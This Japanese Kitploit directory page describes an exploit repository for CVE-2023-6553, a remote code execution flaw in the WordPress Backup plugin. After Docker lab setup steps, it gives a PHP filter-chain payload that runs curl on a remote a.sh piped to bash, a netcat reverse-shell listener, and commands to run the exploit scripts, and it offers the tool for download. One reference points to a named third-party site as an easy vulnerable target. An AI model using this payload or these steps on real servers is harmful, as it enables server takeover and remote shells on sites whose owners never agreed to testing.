Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-6553 — WordPressのバックアッププラグインにおけるCVE-2023-6553のエクスプロイト開発 | Kitploit
ツール/GitHubGitHub/harshit-mashru/cve-2023-6553
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

WordPressのバックアッププラグインにおけるCVE-2023-6553のエクスプロイト開発

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-6553

WordPressのBackupプラグインにおけるCVE-2023-6553のエクスプロイト開発

これはCVSSスコア9.8の重大なCVEです。

この脆弱性により、攻撃者は脆弱なバージョンのプラグインを実行しているサーバーにコマンドを送信できます。

脆弱なバージョン Backup <= 1.3.7

セットアップ

  1. リポジトリをgit cloneします。

  2. 以下のコマンドを実行してDockerコンテナをセットアップします。

root@kitploit:~
docker-compose up -d

2つのDockerコンテナが表示されるはずです。

  • Wordpress
  • SQL
  1. 次に、DockerコンテナのIP上のWordPressサイトに移動できます。また、以下からもアクセスできます。
root@kitploit:~
http://localhost:8000/
  1. 脆弱なバックアッププラグインをインストールするには、次のコマンドを実行します。
root@kitploit:~
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. 次に、手順3のリンクを使用してWordPressウェブサイトにログインし、上記のコマンドでダウンロードしたバックアッププラグインをインストールします。

悪用

  1. ポート9000でリスナーを起動し、エクスプロイト実行時にコールバックを受け取ります。
root@kitploit:~
python3 -m http.server
  1. 以下のコマンドを使用してGoスクリプトを実行します。
root@kitploit:~
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. 次のエラーが表示されます。
root@kitploit:~
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

これは、フィルター変換後にヘッダーのサイズがサーバーが許可するサイズを超えるためです。

  1. そこで、コマンドをチャンクに分割し、リモートサーバー上のファイルに書き込んでから実行します。ただし、その前にリバースシェルを受け取るためにリスニングを開始する必要があります。
root@kitploit:~
nc -nlvp 8080

次に、以下のコマンドを実行して脆弱なプラグインを悪用します。

root@kitploit:~
python3 final_exploit.py
  1. この時点でリバースシェルが取得できているはずです。

参考

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • 脆弱なバージョンのWordPressが存在するかどうかを確認するのがどれだけ簡単か: https://www.thetraveloutlier.com/shop/​
ツールをダウンロード